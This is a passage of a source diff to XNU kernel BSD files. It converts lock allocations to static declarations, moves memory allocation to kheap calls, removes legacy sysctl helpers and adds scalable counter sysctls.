M_TEMP, M_ZERO | M_WAITOK); + buf_size = size; + buf = kheap_alloc(KHEAP_TEMP, buf_size, Z_ZERO | Z_WAITOK); kret = get_sched_statistics(buf, &size); if (kret != KERN_SUCCESS) { @@ -482,7 +486,7 @@ sysctl_sched_stats(__unused struct sysctl_oid *oidp, __unused void *arg1, __unus panic("Sched info changed?!"); } out: - FREE(buf, M_TEMP); + kheap_free(KHEAP_TEMP, buf, buf_size); return error; } @@ -531,11 +535,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS __unused int cmd = oidp->oid_arg2; /* subcommand*/ __unused int *name = arg1; /* oid element argument vector */ __unused int namelen = arg2; /* number of oid element arguments */ - user_addr_t oldp = req->oldptr; /* user buffer copy out address */ - size_t *oldlenp = &req->oldlen; /* user buffer copy out size */ - user_addr_t newp = req->newptr; /* user buffer copy in address */ - size_t newlen = req->newlen; /* user buffer copy in size */ - int error; + int error, changed; int tmp; @@ -547,16 +547,17 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS * for example, to dump current counts: * sysctl -w kern.count_calls=2 */ - error = sysctl_int(oldp, oldlenp, newp, newlen, &tmp); - if (error != 0) { + error = sysctl_io_number(req, do_count_syscalls, + sizeof(do_count_syscalls), &tmp, &changed); + + if (error != 0 || !changed) { return error; } if (tmp == 1) { do_count_syscalls = 1; } else if (tmp == 0 || tmp == 2 || tmp == 3) { - int i; - for (i = 0; i < nsysent; i++) { + for (int i = 0; i < nsysent; i++) { if (syscalls_log[i] != 0) { if (tmp == 2) { printf("%d calls - name %s \n", syscalls_log[i], syscallnames[i]); @@ -565,14 +566,7 @@ sysctl_docountsyscalls SYSCTL_HANDLER_ARGS } } } - if (tmp != 0) { - do_count_syscalls = 1; - } - } - - /* adjust index so we return the right required/consumed amount */ - if (!error) { - req->oldidx += req->oldlen; + do_count_syscalls = (tmp != 0); } return error; @@ -595,65 +589,6 @@ SYSCTL_PROC(_kern, KERN_COUNT_SYSCALLS, count_syscalls, CTLTYPE_NODE | CTLFLAG_R * instead. 
*/ -/* - * Validate parameters and get old / set new parameters - * for an integer-valued sysctl function. - */ -int -sysctl_int(user_addr_t oldp, size_t *oldlenp, - user_addr_t newp, size_t newlen, int *valp) -{ - int error = 0; - - if (oldp != USER_ADDR_NULL && oldlenp == NULL) { - return EFAULT; - } - if (oldp && *oldlenp < sizeof(int)) { - return ENOMEM; - } - if (newp && newlen != sizeof(int)) { - return EINVAL; - } - *oldlenp = sizeof(int); - if (oldp) { - error = copyout(valp, oldp, sizeof(int)); - } - if (error == 0 && newp) { - error = copyin(newp, valp, sizeof(int)); - AUDIT_ARG(value32, *valp); - } - return error; -} - -/* - * Validate parameters and get old / set new parameters - * for an quad(64bit)-valued sysctl function. - */ -int -sysctl_quad(user_addr_t oldp, size_t *oldlenp, - user_addr_t newp, size_t newlen, quad_t *valp) -{ - int error = 0; - - if (oldp != USER_ADDR_NULL && oldlenp == NULL) { - return EFAULT; - } - if (oldp && *oldlenp < sizeof(quad_t)) { - return ENOMEM; - } - if (newp && newlen != sizeof(quad_t)) { - return EINVAL; - } - *oldlenp = sizeof(quad_t); - if (oldp) { - error = copyout(valp, oldp, sizeof(quad_t)); - } - if (error == 0 && newp) { - error = copyin(newp, valp, sizeof(quad_t)); - } - return error; -} - STATIC int sysdoproc_filt_KERN_PROC_PID(proc_t p, void * arg) { @@ -2290,6 +2225,9 @@ SYSCTL_INT(_kern, OID_AUTO, num_taskthreads, SYSCTL_LONG(_kern, OID_AUTO, num_recycledvnodes, CTLFLAG_RD | CTLFLAG_LOCKED, &num_recycledvnodes, ""); +SYSCTL_COMPAT_INT(_kern, OID_AUTO, free_vnodes, + CTLFLAG_RD | CTLFLAG_LOCKED, + &freevnodes, 0, ""); STATIC int sysctl_maxvnodes(__unused struct sysctl_oid *oidp, __unused void *arg1, __unused int arg2, struct sysctl_req *req) @@ -3434,8 +3372,9 @@ SYSCTL_PROC(_debug, #include #include -extern lck_grp_t * sysctl_debug_test_stackshot_owner_grp; /* used for both mutexes and rwlocks */ -extern lck_mtx_t * sysctl_debug_test_stackshot_owner_init_mtx; /* used to protect lck_*_init */ +static 
LCK_GRP_DECLARE(sysctl_debug_test_stackshot_owner_grp, "test-stackshot-owner-grp"); +static LCK_MTX_DECLARE(sysctl_debug_test_stackshot_owner_init_mtx, + &sysctl_debug_test_stackshot_owner_grp); /* This is a sysctl for testing collection of owner info on a lock in kernel space. A multi-threaded * test from userland sets this sysctl in such a way that a thread blocks in kernel mode, and a @@ -3462,17 +3401,17 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus long long mtx_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_lck); int error = sysctl_io_number(req, mtx_unslid_addr, sizeof(long long), (void*)&option, NULL); - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!sysctl_debug_test_stackshot_mtx_inited) { lck_mtx_init(&sysctl_debug_test_stackshot_owner_lck, - sysctl_debug_test_stackshot_owner_grp, + &sysctl_debug_test_stackshot_owner_grp, LCK_ATTR_NULL); semaphore_create(kernel_task, &sysctl_debug_test_stackshot_mutex_sem, SYNC_POLICY_FIFO, 0); sysctl_debug_test_stackshot_mtx_inited = 1; } - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!error) { switch (option) { @@ -3489,15 +3428,15 @@ sysctl_debug_test_stackshot_mutex_owner(__unused struct sysctl_oid *oidp, __unus semaphore_signal(sysctl_debug_test_stackshot_mutex_sem); break; case SYSCTL_DEBUG_MTX_TEARDOWN: - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); lck_mtx_destroy(&sysctl_debug_test_stackshot_owner_lck, - sysctl_debug_test_stackshot_owner_grp); + &sysctl_debug_test_stackshot_owner_grp); semaphore_destroy(kernel_task, sysctl_debug_test_stackshot_mutex_sem); sysctl_debug_test_stackshot_mtx_inited = 0; - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + 
lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); break; case -1: /* user just wanted to read the value, so do nothing */ break; @@ -3543,10 +3482,10 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus long long rwlck_unslid_addr = (long long)VM_KERNEL_UNSLIDE_OR_PERM(&sysctl_debug_test_stackshot_owner_rwlck); int error = sysctl_io_number(req, rwlck_unslid_addr, sizeof(long long), (void*)&option, NULL); - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!sysctl_debug_test_stackshot_rwlck_inited) { lck_rw_init(&sysctl_debug_test_stackshot_owner_rwlck, - sysctl_debug_test_stackshot_owner_grp, + &sysctl_debug_test_stackshot_owner_grp, LCK_ATTR_NULL); semaphore_create(kernel_task, &sysctl_debug_test_stackshot_rwlck_sem, @@ -3554,7 +3493,7 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus 0); sysctl_debug_test_stackshot_rwlck_inited = 1; } - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); if (!error) { switch (option) { @@ -3580,15 +3519,15 @@ sysctl_debug_test_stackshot_rwlck_owner(__unused struct sysctl_oid *oidp, __unus semaphore_signal(sysctl_debug_test_stackshot_rwlck_sem); break; case SYSCTL_DEBUG_KRWLCK_TEARDOWN: - lck_mtx_lock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_lock(&sysctl_debug_test_stackshot_owner_init_mtx); lck_rw_destroy(&sysctl_debug_test_stackshot_owner_rwlck, - sysctl_debug_test_stackshot_owner_grp); + &sysctl_debug_test_stackshot_owner_grp); semaphore_destroy(kernel_task, sysctl_debug_test_stackshot_rwlck_sem); sysctl_debug_test_stackshot_rwlck_inited = 0; - lck_mtx_unlock(sysctl_debug_test_stackshot_owner_init_mtx); + lck_mtx_unlock(&sysctl_debug_test_stackshot_owner_init_mtx); break; case -1: /* user just wanted to read the value, so do nothing */ break; @@ -4343,20 +4282,24 @@ extern int 
vm_page_delayed_work_ctx_needed; SYSCTL_INT(_vm, OID_AUTO, vm_page_needed_delayed_work_ctx, CTLFLAG_RD | CTLFLAG_LOCKED, &vm_page_delayed_work_ctx_needed, 0, ""); /* log message counters for persistence mode */ -extern uint32_t oslog_p_total_msgcount; -extern uint32_t oslog_p_metadata_saved_msgcount; -extern uint32_t oslog_p_metadata_dropped_msgcount; -extern uint32_t oslog_p_error_count; -extern uint32_t oslog_p_saved_msgcount; -extern uint32_t oslog_p_dropped_msgcount; -extern uint32_t oslog_p_boot_dropped_msgcount; -extern uint32_t oslog_p_coprocessor_total_msgcount; -extern uint32_t oslog_p_coprocessor_dropped_msgcount; +SCALABLE_COUNTER_DECLARE(oslog_p_total_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_metadata_saved_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_metadata_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_error_count); +SCALABLE_COUNTER_DECLARE(oslog_p_saved_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_boot_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_total_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_coprocessor_dropped_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_unresolved_kc_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_fmt_invalid_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_fmt_max_args_msgcount); +SCALABLE_COUNTER_DECLARE(oslog_p_truncated_msgcount); /* log message counters for streaming mode */ extern uint32_t oslog_s_total_msgcount; extern uint32_t oslog_s_metadata_msgcount; -extern uint32_t oslog_s_error_count; +SCALABLE_COUNTER_DECLARE(oslog_s_error_count); extern uint32_t oslog_s_streamed_msgcount; extern uint32_t oslog_s_dropped_msgcount; @@ -4369,19 +4312,24 @@ extern uint32_t oslog_msgbuf_dropped_charcount; extern uint32_t vaddlog_msgcount; extern uint32_t vaddlog_msgcount_dropped; -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_total_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, 
oslog_p_metadata_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_saved_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_metadata_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_metadata_dropped_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_error_count, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_saved_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_saved_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_dropped_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_boot_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_boot_dropped_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_total_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_p_coprocessor_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_p_coprocessor_dropped_msgcount, 0, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_total_msgcount, oslog_p_total_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_saved_msgcount, oslog_p_metadata_saved_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_metadata_dropped_msgcount, oslog_p_metadata_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_error_count, oslog_p_error_count, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_saved_msgcount, oslog_p_saved_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_dropped_msgcount, oslog_p_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_boot_dropped_msgcount, oslog_p_boot_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_total_msgcount, oslog_p_coprocessor_total_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_coprocessor_dropped_msgcount, 
oslog_p_coprocessor_dropped_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_unresolved_kc_msgcount, oslog_p_unresolved_kc_msgcount, ""); + +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_invalid_msgcount, oslog_p_fmt_invalid_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_fmt_max_args_msgcount, oslog_p_fmt_max_args_msgcount, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_p_truncated_msgcount, oslog_p_truncated_msgcount, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_total_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_total_msgcount, 0, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_metadata_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_metadata_msgcount, 0, ""); -SYSCTL_UINT(_debug, OID_AUTO, oslog_s_error_count, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_error_count, 0, ""); +SYSCTL_SCALABLE_COUNTER(_debug, oslog_s_error_count, oslog_s_error_count, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_streamed_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_streamed_msgcount, 0, ""); SYSCTL_UINT(_debug, OID_AUTO, oslog_s_dropped_msgcount, CTLFLAG_ANYBODY | CTLFLAG_RD | CTLFLAG_LOCKED, &oslog_s_dropped_msgcount, 0, ""); @@ -4687,6 +4635,8 @@ SYSCTL_QUAD(_kern, OID_AUTO, driverkit_checkin_timed_out, &driverkit_checkin_timed_out, "timestamp of dext checkin timeout"); #endif +extern int IOGetVMMPresent(void); + static int hv_vmm_present SYSCTL_HANDLER_ARGS { @@ -4696,11 +4646,7 @@ hv_vmm_present SYSCTL_HANDLER_ARGS int hv_vmm_present = 0; -#if defined (__arm64__) - /* Need a way to determine if ARM xnu is running as a guest */ -#elif defined (__x86_64__) - hv_vmm_present = cpuid_vmm_present(); -#endif + hv_vmm_present = IOGetVMMPresent(); return SYSCTL_OUT(req, &hv_vmm_present, sizeof(hv_vmm_present)); } @@ -4810,7 +4756,7 @@ SYSCTL_PROC(_kern, OID_AUTO, sysent_const_check, #endif #if DEVELOPMENT || DEBUG -SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 1, ""); 
+SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED | CTLFLAG_KERN, NULL, 1, ""); #else SYSCTL_COMPAT_INT(_kern, OID_AUTO, development, CTLFLAG_RD | CTLFLAG_MASKED, NULL, 0, ""); #endif @@ -5569,52 +5515,59 @@ sysctl_get_owned_vmobjects SYSCTL_HANDLER_ARGS mach_port_name_t task_port_name; task_t task; size_t buffer_size = (req->oldptr != USER_ADDR_NULL) ? req->oldlen : 0; - vmobject_list_output_t buffer; + vmobject_list_output_t buffer = NULL; size_t output_size; size_t entries; + /* we have a "newptr" (for write) we get a task port name from the caller. */ + error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t)); + + if (error != 0) { + goto sysctl_get_vmobject_list_exit; + } + + task = port_name_to_task_read(task_port_name); + if (task == TASK_NULL) { + error = ESRCH; + goto sysctl_get_vmobject_list_exit; + } + + /* get the current size */ + task_copy_vmobjects(task, NULL, 0, &entries); + size_t max_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0; + + /* if buffer_size is specified clamp to the current size then allocate the kernel buffer */ if (buffer_size) { if (buffer_size < sizeof(*buffer) + sizeof(vm_object_query_data_t)) { - return ENOMEM; + error = ENOMEM; + goto sysctl_get_vmobject_list_deallocate_and_exit; } + buffer_size = (buffer_size > max_size) ? max_size : buffer_size; buffer = kheap_alloc(KHEAP_TEMP, buffer_size, Z_WAITOK); if (!buffer) { error = ENOMEM; - goto sysctl_get_vmobject_list_exit; + goto sysctl_get_vmobject_list_deallocate_and_exit; } } else { buffer = NULL; } - /* we have a "newptr" (for write) we get a task port name from the caller.
*/ - error = SYSCTL_IN(req, &task_port_name, sizeof(mach_port_name_t)); - - if (error != 0) { - goto sysctl_get_vmobject_list_exit; - } - - task = port_name_to_task(task_port_name); - if (task == TASK_NULL) { - error = ESRCH; - goto sysctl_get_vmobject_list_exit; - } - /* copy the vmobjects and vmobject data out of the task */ if (buffer_size == 0) { - task_copy_vmobjects(task, NULL, 0, &entries); - output_size = (entries > 0) ? entries * sizeof(vm_object_query_data_t) + sizeof(*buffer) : 0; + output_size = max_size; } else { task_copy_vmobjects(task, &buffer->data[0], buffer_size - sizeof(*buffer), &entries); buffer->entries = (uint64_t)entries; output_size = entries * sizeof(vm_object_query_data_t) + sizeof(*buffer); } - task_deallocate(task); - error = SYSCTL_OUT(req, (char*) buffer, output_size); +sysctl_get_vmobject_list_deallocate_and_exit: + task_deallocate(task); + sysctl_get_vmobject_list_exit: if (buffer) { kheap_free(KHEAP_TEMP, buffer, buffer_size); @@ -5626,3 +5579,20 @@ sysctl_get_vmobject_list_exit: SYSCTL_PROC(_vm, OID_AUTO, get_owned_vmobjects, CTLTYPE_OPAQUE | CTLFLAG_RD | CTLFLAG_WR | CTLFLAG_MASKED | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY, 0, 0, sysctl_get_owned_vmobjects, "A", "get owned vmobjects in task"); + +extern uint64_t num_static_scalable_counters; +SYSCTL_QUAD(_kern, OID_AUTO, num_static_scalable_counters, CTLFLAG_RD | CTLFLAG_LOCKED, &num_static_scalable_counters, ""); + +uuid_string_t trial_treatment_id; +uuid_string_t trial_experiment_id; +int trial_deployment_id = -1; + +SYSCTL_STRING(_kern, OID_AUTO, trial_treatment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_treatment_id, sizeof(trial_treatment_id), ""); +SYSCTL_STRING(_kern, OID_AUTO, trial_experiment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | CTLFLAG_EXPERIMENT, trial_experiment_id, sizeof(trial_experiment_id), ""); +SYSCTL_INT(_kern, OID_AUTO, trial_deployment_id, CTLFLAG_RW | CTLFLAG_LOCKED | CTLFLAG_ANYBODY | 
CTLFLAG_EXPERIMENT, &trial_deployment_id, 0, ""); + +#if DEVELOPMENT || DEBUG +/* For unit testing setting factors & limits. */ +unsigned int testing_experiment_factor; +EXPERIMENT_FACTOR_UINT(_kern, testing_experiment_factor, &testing_experiment_factor, 5, 10, ""); +#endif /* DEVELOPMENT || DEBUG */ diff --git a/bsd/kern/kern_time.c b/bsd/kern/kern_time.c index eac338d17..f67864797 100644 --- a/bsd/kern/kern_time.c +++ b/bsd/kern/kern_time.c @@ -95,15 +95,12 @@ #define HZ 100 /* XXX */ /* simple lock used to access timezone, tz structure */ -lck_spin_t * tz_slock; -lck_grp_t * tz_slock_grp; -lck_attr_t * tz_slock_attr; -lck_grp_attr_t *tz_slock_grp_attr; +static LCK_GRP_DECLARE(tz_slock_grp, "tzlock"); +static LCK_SPIN_DECLARE(tz_slock, &tz_slock_grp); static void setthetime( struct timeval *tv); -void time_zone_slock_init(void); static boolean_t timeval_fixusec(struct timeval *t1); /* @@ -151,9 +148,9 @@ gettimeofday( } if (uap->tzp) { - lck_spin_lock(tz_slock); + lck_spin_lock(&tz_slock); ltz = tz; - lck_spin_unlock(tz_slock); + lck_spin_unlock(&tz_slock); error = copyout((caddr_t)&ltz, CAST_USER_ADDR_T(uap->tzp), sizeof(tz)); } @@ -224,9 +221,9 @@ settimeofday(__unused struct proc *p, struct settimeofday_args *uap, __unused i setthetime(&atv); } if (uap->tzp) { - lck_spin_lock(tz_slock); + lck_spin_lock(&tz_slock); tz = atz; - lck_spin_unlock(tz_slock); + lck_spin_unlock(&tz_slock); } return 0; } @@ -921,21 +918,6 @@ ppsratecheck(struct timeval *lasttime, int *curpps, int maxpps) } #endif /* NETWORKING */ -void -time_zone_slock_init(void) -{ - /* allocate lock group attribute and group */ - tz_slock_grp_attr = lck_grp_attr_alloc_init(); - - tz_slock_grp = lck_grp_alloc_init("tzlock", tz_slock_grp_attr); - - /* Allocate lock attribute */ - tz_slock_attr = lck_attr_alloc_init(); - - /* Allocate the spin lock */ - tz_slock = lck_spin_alloc_init(tz_slock_grp, tz_slock_attr); -} - int __mach_bridge_remote_time(__unused struct proc *p, struct
__mach_bridge_remote_time_args *mbrt_args, uint64_t *retval) { diff --git a/bsd/kern/kern_xxx.c b/bsd/kern/kern_xxx.c index 2e111de75..2a7942ce9 100644 --- a/bsd/kern/kern_xxx.c +++ b/bsd/kern/kern_xxx.c @@ -154,7 +154,7 @@ skip_cred_check: } extern void OSKextResetAfterUserspaceReboot(void); -extern void zone_gc(boolean_t); +extern void zone_gc_drain(void); int usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retval) @@ -184,7 +184,7 @@ usrctl(struct proc *p, __unused struct usrctl_args *uap, __unused int32_t *retva int shm_error = pshm_cache_purge_all(p); int sem_error = psem_cache_purge_all(p); - zone_gc(FALSE); + zone_gc_drain(); return shm_error != 0 ? shm_error : sem_error; } diff --git a/bsd/kern/kpi_mbuf.c b/bsd/kern/kpi_mbuf.c index 8cd16e220..8e1d821ce 100644 --- a/bsd/kern/kpi_mbuf.c +++ b/bsd/kern/kpi_mbuf.c @@ -52,7 +52,7 @@ static const mbuf_flags_t mbuf_cflags_mask = (MBUF_EXT); #define MAX_MBUF_TX_COMPL_FUNC 32 mbuf_tx_compl_func mbuf_tx_compl_table[MAX_MBUF_TX_COMPL_FUNC]; -extern lck_rw_t *mbuf_tx_compl_tbl_lock; +extern lck_rw_t mbuf_tx_compl_tbl_lock; u_int32_t mbuf_tx_compl_index = 0; #if (DEVELOPMENT || DEBUG) @@ -1782,11 +1782,11 @@ get_tx_compl_callback_index(mbuf_tx_compl_func callback) { u_int32_t i; - lck_rw_lock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock); i = get_tx_compl_callback_index_locked(callback); - lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock); return i; } @@ -1800,9 +1800,9 @@ m_get_tx_compl_callback(u_int32_t idx) ASSERT(0); return NULL; } - lck_rw_lock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock); cb = mbuf_tx_compl_table[idx]; - lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock); return cb; } @@ -1816,7 +1816,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback) return EINVAL; } - lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock); + 
lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock); i = get_tx_compl_callback_index_locked(callback); if (i != -1) { @@ -1834,7 +1834,7 @@ mbuf_register_tx_compl_callback(mbuf_tx_compl_func callback) } } unlock: - lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock); return error; } @@ -1849,7 +1849,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback) return EINVAL; } - lck_rw_lock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_lock_exclusive(&mbuf_tx_compl_tbl_lock); /* assume the worst */ error = ENOENT; @@ -1861,7 +1861,7 @@ mbuf_unregister_tx_compl_callback(mbuf_tx_compl_func callback) } } unlock: - lck_rw_unlock_exclusive(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_exclusive(&mbuf_tx_compl_tbl_lock); return error; } @@ -1950,9 +1950,9 @@ m_do_tx_compl_callback(struct mbuf *m, struct ifnet *ifp) continue; } - lck_rw_lock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_lock_shared(&mbuf_tx_compl_tbl_lock); callback = mbuf_tx_compl_table[i]; - lck_rw_unlock_shared(mbuf_tx_compl_tbl_lock); + lck_rw_unlock_shared(&mbuf_tx_compl_tbl_lock); if (callback != NULL) { callback(m->m_pkthdr.pkt_compl_context, diff --git a/bsd/kern/kpi_socket.c b/bsd/kern/kpi_socket.c index 30d0b513a..53f886c28 100644 --- a/bsd/kern/kpi_socket.c +++ b/bsd/kern/kpi_socket.c @@ -237,7 +237,7 @@ sock_bind(socket_t sock, const struct sockaddr *to) } if (to->sa_len > sizeof(ss)) { - MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME, M_WAITOK); + sa = kheap_alloc(KHEAP_TEMP, to->sa_len, Z_WAITOK); if (sa == NULL) { return ENOBUFS; } @@ -250,7 +250,7 @@ sock_bind(socket_t sock, const struct sockaddr *to) error = sobindlock(sock, sa, 1); /* will lock socket */ if (sa != NULL && want_free == TRUE) { - FREE(sa, M_SONAME); + kheap_free(KHEAP_TEMP, sa, sa->sa_len); } return error; @@ -270,8 +270,8 @@ sock_connect(socket_t sock, const struct sockaddr *to, int flags) } if (to->sa_len > sizeof(ss)) { - MALLOC(sa, struct sockaddr *, to->sa_len, M_SONAME, - 
(flags & MSG_DONTWAIT) ? M_NOWAIT : M_WAITOK); + sa = kheap_alloc(KHEAP_TEMP, to->sa_len, + (flags & MSG_DONTWAIT) ? Z_NOWAIT : Z_WAITOK); if (sa == NULL) { return ENOBUFS; } @@ -323,7 +323,7 @@ out: socket_unlock(sock, 1); if (sa != NULL && want_free == TRUE) { - FREE(sa, M_SONAME); + kheap_free(KHEAP_TEMP, sa, sa->sa_len); } return error; @@ -475,9 +475,8 @@ sogetaddr_locked(struct socket *so, struct sockaddr **psa, int peer) if (error == 0 && *psa == NULL) { error = ENOMEM; - } else if (error != 0 && *psa != NULL) { + } else if (error != 0) { FREE(*psa, M_SONAME); - *psa = NULL; } return error; } @@ -501,9 +500,7 @@ sock_getaddr(socket_t sock, struct sockaddr **psa, int peer) void sock_freeaddr(struct sockaddr *sa) { - if (sa != NULL) { - FREE(sa, M_SONAME); - } + FREE(sa, M_SONAME); } errno_t @@ -806,9 +803,7 @@ cleanup: if (control != NULL) { m_freem(control); } - if (fromsa != NULL) { - FREE(fromsa, M_SONAME); - } + FREE(fromsa, M_SONAME); return error; } diff --git a/bsd/kern/kpi_socketfilter.c b/bsd/kern/kpi_socketfilter.c index 4492cf15f..8c3976246 100644 --- a/bsd/kern/kpi_socketfilter.c +++ b/bsd/kern/kpi_socketfilter.c @@ -60,6 +60,12 @@ #define SFEF_NODETACH 0x2 /* Detach should not be called */ #define SFEF_NOSOCKET 0x4 /* Socket is gone */ +/* + * If you need accounting for KM_IFADDR consider using + * KALLOC_HEAP_DEFINE to define a view. 
+ */ +#define KM_IFADDR KHEAP_DEFAULT + struct socket_filter_entry { struct socket_filter_entry *sfe_next_onsocket; struct socket_filter_entry *sfe_next_onfilter; @@ -85,9 +91,12 @@ struct socket_filter { TAILQ_HEAD(socket_filter_list, socket_filter); -static struct socket_filter_list sock_filter_head; -static lck_rw_t *sock_filter_lock = NULL; -static lck_mtx_t *sock_filter_cleanup_lock = NULL; +static LCK_GRP_DECLARE(sock_filter_lock_grp, "socket filter lock"); +static LCK_RW_DECLARE(sock_filter_lock, &sock_filter_lock_grp); +static LCK_MTX_DECLARE(sock_filter_cleanup_lock, &sock_filter_lock_grp); + +static struct socket_filter_list sock_filter_head = + TAILQ_HEAD_INITIALIZER(sock_filter_head); static struct socket_filter_entry *sock_filter_cleanup_entries = NULL; static thread_t sock_filter_cleanup_thread = NULL; @@ -143,26 +152,6 @@ sflt_permission_check(struct inpcb *inp) return 0; } -__private_extern__ void -sflt_init(void) -{ - lck_grp_attr_t *grp_attrib = NULL; - lck_attr_t *lck_attrib = NULL; - lck_grp_t *lck_group = NULL; - - TAILQ_INIT(&sock_filter_head); - - /* Allocate a rw lock */ - grp_attrib = lck_grp_attr_alloc_init(); - lck_group = lck_grp_alloc_init("socket filter lock", grp_attrib); - lck_grp_attr_free(grp_attrib); - lck_attrib = lck_attr_alloc_init(); - sock_filter_lock = 